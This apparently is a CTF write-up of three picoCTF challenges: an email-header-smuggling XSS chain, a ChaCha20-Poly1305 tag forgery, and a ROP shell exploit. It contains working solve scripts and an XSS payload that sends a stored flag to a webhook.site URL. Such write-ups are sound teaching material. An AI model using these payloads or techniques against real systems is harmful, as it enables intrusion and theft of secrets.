## Secure Email Service
### surveying the challenge
The first thing I (voxal) looked at was how to obtain the flag. The goal was getting the admin to open a signed message with an XSS payload in it
`email.html`
```js=
if (parsed.html) {
const signed = await getSigned(msg.data, await rootCert());
if (signed) {
const { html } = await parse(signed);
const shadow = content.attachShadow({ mode: 'closed' });
shadow.innerHTML = `<style>:host { all: initial }</style>${html}`;
} else {
content.style.color = 'red';
content.innerText = 'invalid signature!';
}
} else {
const pre = document.createElement('pre');
pre.style.overflow = 'auto';
pre.innerText = parsed.text;
content.appendChild(pre);
}
```
If both the email had HTML, and it was signed, it would embed the HTML into the page giving us XSS.
The first thing we decided to look at were the WASM binaries because another challenge (pachinko revisited) involved reverse engineering a WASM binary, quickly we realized that 1) the OpenSSL binary was basically just the CLI tool, so that wasn't vulnerable, and 2) the parser was based on a rust crate called [mail-parser](https://lib.rs/crates/mail-parser) (obtained by running strings on the binary).
The first thing we looked at was whether it was possible to somehow forge the signature, or some other way to solve the challenge through cryptography. We quickly abandoned this both because it would involve finding a vulnerability in `openssl`, and since I'm quite familiar with the authors' challenges, and I doubted that they would make this a crypto challenge.
I had a revelation when looking at the javascript of `reply.html`:
```js=
import { email, requireLogin, send } from './src/api.js'
import { parse } from './src/email.js'
await requireLogin();
const id = new URL(window.location.href).searchParams.get('id');
if (!/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/.test(id)) {
alert('invalid id');
location.href = '/inbox.html';
}
const parsed = await parse((await email(id)).data);
const subject = `Re: ${parsed.subject}`;
document.getElementById('subject').innerText = subject;
document.getElementById('reply').onsubmit = async e => {
e.preventDefault();
const body = document.querySelector('[name=body]').value;
try {
await send(parsed.from, subject, body); // this line
} catch(e) {
alert(e);
return;
}
alert('sent!');
location.href = '/inbox.html';
}
```
What I realized was it was using the `parsed.from` from the parsed email that the reply email would be sent to, so if we somehow manage to modify that header, we would be able to force the admin bot to send a signed email to itself, and since signed messages would get embedded, if we could control the body of the email, we would be able to get XSS.
In order to control the body, we needed to first predict the boundary that python generates in the multipart message, so I set my teammates HELLOPERSON and smashmaster to working to crack python random to predict the boundary.

### smuggling the header
Since this was our attack vector, we started to look at the email generation code.
```py=
def generate_email(
sender: str,
recipient: str,
subject: str,
content: str,
html: bool = False,
sign: bool = False,
cert: str = '',
key: str = '',
) -> str:
msg = MIMEMultipart()
msg['From'] = sender
msg['To'] = recipient
msg['Subject'] = subject
msg.attach(MIMEText(content))
if html:
msg.attach(MIMEText(content, 'html'))
if sign:
return smail.sign_message(msg, key.encode(), cert.encode()).as_string()
return msg.as_string()
```
We copied the logic into a solve script file, and tried spoofing a from header in the Subject field
```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC
From: admin@ses
"""
msg.attach(MIMEText("text"))
print(msg.as_string())
```
Run:
```
Traceback (most recent call last):
File "/home/voxal/code/ctf/pico-2025/secure-email-service/tester.py", line 13, in <module>
print(msg.as_string())
~~~~~~~~~~~~~^^
...
File "/usr/lib/python3.13/email/header.py", line 385, in encode
raise HeaderParseError("header value appears to contain "
"an embedded header: {!r}".format(value))
email.errors.HeaderParseError: header value appears to contain an embedded header: 'ABC\nFrom: admin@ses'
```
Hmm nope, looks like there's some logic checking for the exact thing I'm doing. Although the `README` of `mail-parser` does say
> In general, this library abides by the Postel's law or Robustness Principle which states that an implementation must be conservative in its sending behavior and liberal in its receiving behavior. This means that mail-parser will make a best effort to parse non-conformant e-mail messages as long as these do not deviate too much from the standard.
so we could try some variations of the header and see if the parser is lenient enough to parse the extra `From` header.
Maybe a space after the header name?
```py=
msg['Subject'] = f"""ABC
From : admin@ses
"""
```
gives:
```
email.errors.HeaderWriteError: folded header contains newline: 'Subject: ABC\nFrom : admin@ses\n'
```
Different error, still doesn't work. Maybe a space before the header
```py=
msg['Subject'] = f"""ABC
From: admin@ses
"""
```
gives:
```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From: admin@ses
--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
text
--fixed--
```
Hey! It produced an email, lets try parsing it. We can write this file to `email.eml`, and using wasmtime to run the parser (this is the same way the javascript does it).
```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
"from": "user@ses",
"html": null,
"subject": "ABC From: admin@ses",
"text": "text",
"to": "admin@ses"
}
```
Nope, the from field is still `"user@ses"`, and instead the header got put in the `subject`.
We tried more things, but none of them seemed to work, we were at a block, until a teammate reminded me that I was on Python 3.13 while the challenge was running Python 3.11.
I tried doing a space after the header (because we tested it, and the parser would accept it) and well...
```py=
msg['Subject'] = f"""ABC
From : admin@ses
"""
```
gives:
```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From : admin@ses
--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
text
--fixed--
```
Haha.. It worked! and the parser parses it like a new header as well!
```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
"from": "admin@ses",
"html": null,
"subject": "ABC",
"text": "text",
"to": "admin@ses"
}
```
### controlling the body
Next we needed a way to control the body of the reply email somehow. Again, the only field we had control over was the subject. So it should just be as easy as adding a `\n\n` to the `Subject` header to get control of the body right?
```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC
From : admin@ses
--fixed
xss payload goes here
"""
msg.attach(MIMEText("text"))
print(msg.as_string())
```
gives:
```
Content-Type: multipart/mixed; boundary="fixed"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: ABC
From : admin@ses
--fixed
xss payload goes here
--fixed
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
text
--fixed--
```
At this point I was confusing myself between the inital and reply email, so even if this worked, the reply wouldn't be hyjacked, I lose track of these things pretty easily. Well regardless, looks like python also strips this as well. What a shame. Well lets find a way to bypass this.
We found this [github issue](https://github.com/python/cpython/issues/121650) that seemed to be exactly what we needed. By using MIME encoding, hopefully we could smuggle in 2 newlines into the reply email.
```py=
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = """ABC =?UTF-8?Q?=0A?=--replybound =?UTF-8?Q?=0A?=xss payload goes here
From : admin@ses
"""
eml = open("email.eml", "w")
eml.write(msg.as_string())
eml.close()
sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True)
print(sub.stdout)
print(sub.stderr)
obj = json.loads(sub.stdout)
print("vvvvvvvv REPLY BELOW vvvvvvvv")
print()
rep = MIMEMultipart(boundary="replybound")
rep['From'] = "user@ses"
rep['To'] = obj["from"]
rep['Subject'] = f"Re: {obj['subject']}"
print(rep.as_string())
```
Oh yeah we updated our script so we could see how the reply email looked so we could confirm we were able to hyjack the body of the email.
Either way, running this gave us:
```
^^^
initial email cut for brevity
---
{
"from": "admin@ses",
"html": null,
"subject": "ABC \n --replybound \n xss payload goes here",
"text": "text",
"to": "admin@ses"
}
vvvvvvvv REPLY BELOW vvvvvvvv
Content-Type: multipart/mixed; boundary="replybound"
MIME-Version: 1.0
From: user@ses
To: admin@ses
Subject: Re: ABC
--replybound
xss payload goes here
--replybound
--replybound--
```
Yeah I should have expected this, we did manage to smuggle newlines to the reply email though!
(A side note, if you look at the `\n` in the parsed message, you'll see that there are spaces on both sides of it, this annoyed us since we couldn't control reply headers until we figured this out. We realized we could just encode the entire message)
Anyways we spent quite a while banging our heads trying to figure out how to get 2 newlines without python stripping them out.
We gave up on this approach after looking at the source code
```py=
for line in lines[1:]:
formatter.newline()
if charset.header_encoding is not None:
formatter.feed(self._continuation_ws, ' ' + line.lstrip(),
charset)
else:
sline = line.lstrip()
fws = line[:len(line)-len(sline)]
formatter.feed(fws, sline, charset)
if len(lines) > 1:
formatter.newline()
```
This code ensures that there is text in the line before adding **a single new line** (`formatter.newline()`), so there would be no way of smuggling our way into the body.
### a new way forward
I did a second pass of the source code and, realized something very suspicious.
```py=
@app.post('/api/send')
async def send(
user: Annotated[User, Depends(db.request_user)],
to: Annotated[str, Body()],
subject: Annotated[str, Body()],
body: Annotated[str, Body()]
):
# make sure the email we're sending to is valid
recipient = await db.get_user(to)
if len(user.public_key) == 0:
msg = util.generate_email(
sender=user.username,
recipient=recipient.username,
subject=subject,
content=body,
)
else:
msg = util.generate_email(
sender=user.username,
recipient=recipient.username,
subject=subject,
# vvvvvvv
content=template.render(
title=subject,
content=body
),
# ^^^^^^^
html=True,
sign=True,
cert=user.public_key,
key=user.private_key
)
email_id = str(uuid.uuid4())
await db.send_email(recipient, email_id, msg)
return email_id
```
Sending an admin email would use the jinja template! This would give us access to the body of the reply.
Removing all the styles and other misc crap in the template we're left with
```html=
<!DOCTYPE html>
<html>
<body>
<div class="email-container">
<h1>{{ title }}</h1>
<pre>{{ content }}</pre>
</div>
</body>
</html>
```
We have control over the title! We can't just toss a XSS payload at this thing since they're using `{{ }}` so we'll need to be more creative.
The idea that formed was to make our subject have an encoded chunk so when it was decoded in the reply and put into the template, the parser would be tricked into thinking that our subject in the template was a new multipart chunk so when the parser parsed our email, it would parse the chunk to be the body of the email.
```py=
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import os
import subprocess
import json
import base64
from jinja2 import Template
template = Template(open('./template.jinja2', 'r').read(), autoescape=True)
def encode(text):
return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="
content_type = '\nContent-Type : multipart/mixed; boundary="replybound"'
replybound = ''
# the base64 encoded thingy is our payload, we seperate it out for
# our final solve script
payload = '\nSubject : \n--replybound\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\nPHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+\n--replybound\n'
lb = "\n"
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
"""
print("vvvv FINAL OUTPUT BELOW")
print(f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
""")
print("^^^^ FINAL OUTPUT ABOVE")
msg.attach(MIMEText("text"))
print(msg.as_string())
eml = open("email.eml", "w")
eml.write(msg.as_string())
eml.close()
sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True)
print(sub.stdout)
print(sub.stderr)
obj = json.loads(sub.stdout)
print("vvvvvvv SUBJECT BELOW vvvvvv")
print(obj['subject'])
print("vvvvvvvv REPLY BELOW vvvvvvvv")
print()
rep = MIMEMultipart(boundary="replybound")
rep['From'] = "admin@ses"
rep['To'] = obj["from"]
rep['Subject'] = f"Re: {obj['subject']}"
admin_content = '\n\n'.join([
'We\'ve gotten your message and will respond soon.',
'Thank you for choosing SES!',
'Best regards,',
'The Secure Email Service Team'
])
admin_rendered = template.render(
title=obj['subject'],
content=admin_content
)
rep.attach(MIMEText(admin_rendered))
# rep.attach(MIMEText(admin_rendered, 'html'))
print(rep.as_string())
```
Here's what the reply looks like:
```
Content-Type: multipart/mixed; boundary="replybound"
MIME-Version: 1.0
From: admin@ses
To: admin@ses
Subject: Re: ABC
Subject :
--replybound
Content-Type : text/html
Content-Transfer-Encoding : base64
PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+
--replybound
Content-Type : multipart/mixed; boundary="replybound"
--replybound
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
<!DOCTYPE html>
<html>
<body>
<div class="email-container">
<h1>ABC
Subject :
--replybound
Content-Type : text/html
Content-Transfer-Encoding : base64
PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+
--replybound
Content-Type : multipart/mixed; boundary="replybound"</h1>
<pre>We've gotten your message and will respond soon.
Thank you for choosing SES!
Best regards,
The Secure Email Service Team</pre>
</div>
</body>
</html>
--replybound--
```
And lets take the reply email and put it into the parser...
```bash
❯ wasmtime --dir . frontend/public/wasm/parser.wasm
{
"from": "admin@ses",
"html": "<script>fetch(\"//webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?\" + localStorage.flag)</script>",
"subject": null,
"text": "<!DOCTYPE html>\n<html>\n<body>\n <div class=\"email-container\">\n <h1>ABC\nSubject :",
"to": "admin@ses"
}
```
Hey would you look at that! We got it!
### we did infact, not get it.
After testing this against a local instance, well lets just say we forgot that the email was signed.
The concept still had merit though, we just needed to adapt it to the format of the signed email. Since any headers we injected were put at the top level of the signed email, we could no longer control the `Content-Type` of the inner email, and thus couldn't change the boundary to what we needed it to be. This meant that we needed to predict the boundary, which was possible through randcracking.
My teammates unvariant and HELLOPERSON wrote the randcracker for me.
Looking at the [cpython source](https://github.com/python/cpython/blob/72e5b25efb580fb1f0fdfade516be90d90822164/Lib/email/generator.py#L387), we can see that the boundary is generated using `random.randrange(sys.maxsize)`. Since `sys.maxsize` is 2^63-1, this should reliably generate 63 'clean' bits from the MT19937 PRNG. Since each block from MT19937 is supposed to be 32 bits, this means we are uncertain about one bit from each set of 2 consecutive blocks, which means we should use a symbolic mersenne twister cracker (which likely uses z3). Searching around for one, we can find [this](https://github.com/icemonster/symbolic_mersenne_cracker/blob/main/main.py) implementation, which is perfect for our purposes.
To predict the boundary, we first need to collect a sufficient number of samples to recover the MT19937 state. In theory, this can be done using 624 32 bit outputs, but to be safe, we collected over 1,000 63 bit outputs. Feeding these inputs into the randcracker in the right format (*cough cough `bin` doesn't pad*), we can predict the next outputs of `random.randrange(sys.maxsize)` and thus predict the boundary!
Alright, now that we were able to predict the boundary, we were ready to rip the exploit.
Our final payload was as follows:
```py=
def encode(text):
return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?="
boundary = "===============7570496185067173140=="
js_payload = '<img src=x onerror=fetch("https://webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?"+localStorage.flag,{mode:"no-cors"}) />'
encoded_js_payload = base64.b64encode(js_payload.encode()).decode()
content_type = '\nContent-Type : multipart/mixed; boundary="="'
replybound = ''
payload = f'\nSubject : \n--{boundary}\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\n{encoded_js_payload}\n--{boundary}\n'
lb = "\n"
msg = MIMEMultipart(boundary="fixed")
msg['From'] = "user@ses"
msg['To'] = "admin@ses"
msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)}
From : admin@ses
"""
```
We need the extra `Content-Type : multipart/mixed; boundary="="` since the extra chunk we injected required a injected `Content-Type : text/html`, so we need to remedy that, luckily the mail parser was lenient enough to let this boundary through (it doesn't conform to spec at all lol).
Anyways now that we had our exploit we sent it at the server, hoping for a response.

Any day now..
...
...
Oh whats that?
```py=
@classmethod
def _make_boundary(cls, text=None):
# Craft a random boundary. If text is given, ensure that the chosen
# boundary doesn't appear in the text.
token = random.randrange(sys.maxsize)
boundary = ('=' * 15) + (_fmt % token) + '=='
if text is None:
return boundary
b = boundary
counter = 0
while True:
cre = cls._compile_re('^--' + re.escape(b) + '(--)?$', re.MULTILINE)
if not cre.search(text):
break
b = boundary + '.' + str(counter)
counter += 1
return b
```
Okay so it turns out that python still really does not like us, and it tries to prevent us from doing this exact thing by checking the body for the pattern `^--{boundary}(--)?$`. But hey, remember how lenient the parser is?
```py=
boundary = "===============7570496185067173140==a"
```
And send it off again, and soon enough we get our flag :D
sorry for this writeup being so long, there are so many different things we tried and i wanted to document them all, i pity whoever needs to read this. (you guys did say step by step right?)
## Cha Cha Slide
Opening the source, we can very quickly ascertain that the goal of this challenge is to forge a ChaCha20-Poly1305 tag, given two known messages tagged with the same nonce. Forging the encrypted message itself given known plaintext and identical keystream is quite trivial, so we will not focus on forging this part of the final message.
Having previously played PlaidCTF 2024, I recalled that there was a very similar challenge, [DHCPPP](https://github.com/sajjadium/ctf-archives/blob/main/ctfs/PlaidCTF/2024/DHCPPP/dhcppp.c31987bce7265cdacd3329769acada11b26f8d57cc6a9676e3a6dda3b5c90200.py), with the very similar premise of forging a ChaCha20-Poly1305 message. So, I decided to use a few of the easily available solve scripts online ([1](https://sectt.github.io/writeups/Plaid24/DHCPPP/exploit.py), [2](https://hackmd.io/@tranminhprvt01/PlaidCTF2024)) as a starting point for solving the challenge.
Since the first one appears to be using some specialized technique abusing the fact that the DHCPPP packets were mostly identical, we will be reusing most of the functions/functionality from the second writeup.
Let's try to understand the theory behind the solve. Firstly, we need to understand what, exactly, the data that goes into the Poly1305 authentication is.

This diagram on Wikipedia shows it quite well. There is some "Associated Data" (which is empty for our purposes), which is concatenated with null bytes to pad it to a multiple of 16, then the ciphertext of the ChaCha20, that is then padded to a multiple of 16 bytes with null bytes again, which is then followed by the lengths of the associated data and the ciphertext. The lengths are handled by `struct.pack('<Q', len(data))`, which packs the length into an 8 byte LE format. Note that after this process, the total length of the data should be a multiple of 16.
After wrangling with the inputs to the Poly1305 hash, it's quite simple to find the secret key `r` given two (input, output) pairs with the same key. At the start of the Poly1305 hash, the input is split into coefficients to a polynomial, where a secret constant derived from the original ChaCha20 keystream is also added. This polynomial is evaluated at `r` modulo 2^130-5, and the last 128 bits are used as the hash.
To recover `r` from two such (input, output) pairs, we can do the following:
1. Subtract the outputs. This cancels out the secret constant.
2. Brute force the truncated bits. There are only 9 values to test, as the truncation modifies the difference by a value `k` at maximum, where -4\*2^128 < k < 4\*2^128. Call the real output `c`.
3. Subtract the input polynomials. Call this new polynomial `f`.
4. Find the values where `f(r) = c`. Note that since `r` is restricted in which bits can be 1, we can often identify the only possible candidate for `r`.
Now, we can forge the ciphertext using typical stream cipher techniques, and then use the ciphertext and our recovered (r, s) values to forge a Poly1305 tag. Submitting this to the server (making sure that all our variable names are correct), we receive the flag. Solve script is below.
```python=
import struct
from pwn import *
from Crypto.Util.number import *
from sage.all import *
context.log_level = 'critical'
P = 2**130 - 5
p = PolynomialRing(GF(2**130-5), 'x')
x = p.gen()
def pad16(data):
"""Return padding for the Associated Authenticated Data"""
#print(data, type(data))
if len(data) % 16 == 0:
return bytes(0)
else:
return bytes(16-(len(data)%16))
def get_blocks(c):
data = b""
mac_data = c + pad16(c)
mac_data += struct.pack('<Q', len(data))
mac_data += struct.pack('<Q', len(c))
c = mac_data
real_c = []
for i in range(0, len(c), 16):
n = c[i:i+16]
n = n + b'\x01'
n += (17-len(n)) * b'\x00'
assert len(n) == 17
real_c.append(int.from_bytes(n, byteorder='little'))
return real_c
def tag(c, r, s):
mod2 = 2**128
real_c = get_blocks(c)
c = real_c
n = len(c)
res = 0
for i in range(n):
res += c[i]
res = (r*res) % P
return (res + s) % mod2
def atk(pair1, pair2, nonce, m3):
m1, c1, t1 = pair1
m2, c2, t2 = pair2
t1 = int.from_bytes(t1, byteorder='little')
t2 = int.from_bytes(t2, byteorder='little')
keystream = bytes(a ^ b for a, b in zip(c1, m1))
c3 = bytes(a ^ b for a, b in zip(m3, keystream))
f1 = 0
f2 = 0
for i in get_blocks(c1):
f1 += i
f1 *= x
for i in get_blocks(c2):
f2 += i
f2 *= x
rs = []
for k in range(-4, 5):
rhs = t1 - t2 + 2**128 * k
f = rhs - (f1 - f2)
for r, _ in f.roots():
if int(r) & 0x0ffffffc0ffffffc0ffffffc0fffffff == int(r):
s = (t1 - int(f1(r))) % 2**128
rs.append((r, s))
r, s = map(int, rs[0])
t3 = tag(c3, r, s)
t3 = long_to_bytes(t3)[::-1]
return c3, t3
messages = [
b"Did you know that ChaCha20-Poly1305 is an authenticated encryption algorithm?",
b"That means it protects both the confidentiality and integrity of data!"
]
goal = "But it's only secure if used correctly!"
# io = remote("activist-birds.picoctf.net", 61677)
io = process(['python3', 'picoserver.py'])
io.recvuntil(b"Ciphertext (hex): ")
a = io.recvline().strip().decode()
c1 = bytes.fromhex(a)
io.recvuntil(b"Ciphertext (hex): ")
a = io.recvline().strip().decode()
c2 = bytes.fromhex(a)
def extract(pkt):
ct = pkt[:-28]
tag = pkt[-28:-12]
nonce = pkt[-12:]
return ct, tag, nonce
c1, t1, n1 = extract(c1)
c2, t2, n2 = extract(c2)
n = n1
m1, m2 = messages
m3 = goal.encode()
c3, t3 = atk((m1, c1, t1), (m2, c2, t2), n, m3)
forged = c3 + t3 + n
io.sendline(forged.hex())
io.interactive()
```
## handoff
Looking at the source, we can see an obvious buffer overflow into the feedback array. However using the buffer overflow we can control `rbp`, `rip`, and nothing else. While this is exploitable it is annoying and not very fun. Instead we exploit the negative indexing into the `entries` array, which writes more data. Writing to `entries[-1]` allows you to overwrite the `fgets` return address and set up a ROP chain in `entries[0]`. Since the binary is compiled without PIE, we don't need to leak anything to do ROP. The handout does not provide remote libc, so we leak GOT entries using a ROP chain `pop rdi ; puts`. Throwing the leaked addresses into `libc.rip` gives hits for `ubuntu 2.35`. Now we can calculate libc base from the libc leaks and pop a shell with `system("/bin/sh")`
### solve script
```py=
from pwn import *
context.terminal = ["kitty"]
context.binary = file = ELF("./handoff")
libc = ELF("./libc.so.6")
script = """
# b *0x0040136e
# b *fgets+0xfe
c
"""
if not args.REMOTE:
p = gdb.debug("./handoff", gdbscript=script)
def add(name: bytes):
p.sendlineafter(b"app\n", b"1")
p.sendlineafter(b": \n", name)
def edit(idx: int, data: bytes):
p.sendlineafter(b"app\n", b"2")
p.sendlineafter(b"?\n", f"{idx}".encode())
p.sendlineafter(b"?\n", data)
poprdi = 0x0000000000401473
puts = 0x00401090
def connect():
if args.REMOTE:
return remote("shape-facility.picoctf.net", "50867")
def arbread(addr: int):
# global p
# p = connect()
payload = flat({
0x00: poprdi + 1,
0x08: poprdi + 1,
0x10: p64(number=file.sym.main)
})
add(payload)
payload = flat({
0x28: poprdi,
0x30: addr,
0x38: puts,
})
edit(-1, payload)
leak = u64(p.recvline()[:-1].ljust(8, b"\x00"))
log.info(f"{leak = :#x}")
# p.close()
return leak
# arbread(file.got.fgets) 0x71eff9797380
# arbread(file.got.puts) # 0x7992b5c88380
# arbread(file.got.getchar) # 0x7476c2d32380
# arbread(file.got.fflush) # 0x7a1490b36380
# arbread(file.got.setvbuf) # 0x7e85d23cb380
if args.REMOTE:
p = connect()
fgets = arbread(file.got.fgets)
libcbase = fgets - 0x7f380
libc.address = libcbase
log.info(f"{libcbase = :#x}")
# adjusted = (fgets - 0x80000) & ~0xfff
# arbread(fgets)
p.recvuntil(b"option\n")
payload = flat({
0x00: libc.sym.system
})
add(payload)
payload = flat({
0x28: poprdi,
0x30: next(libc.search(b"/bin/sh\x00")),
0x38: poprdi + 1,
})
edit(-1, payload)
p.interactive()
```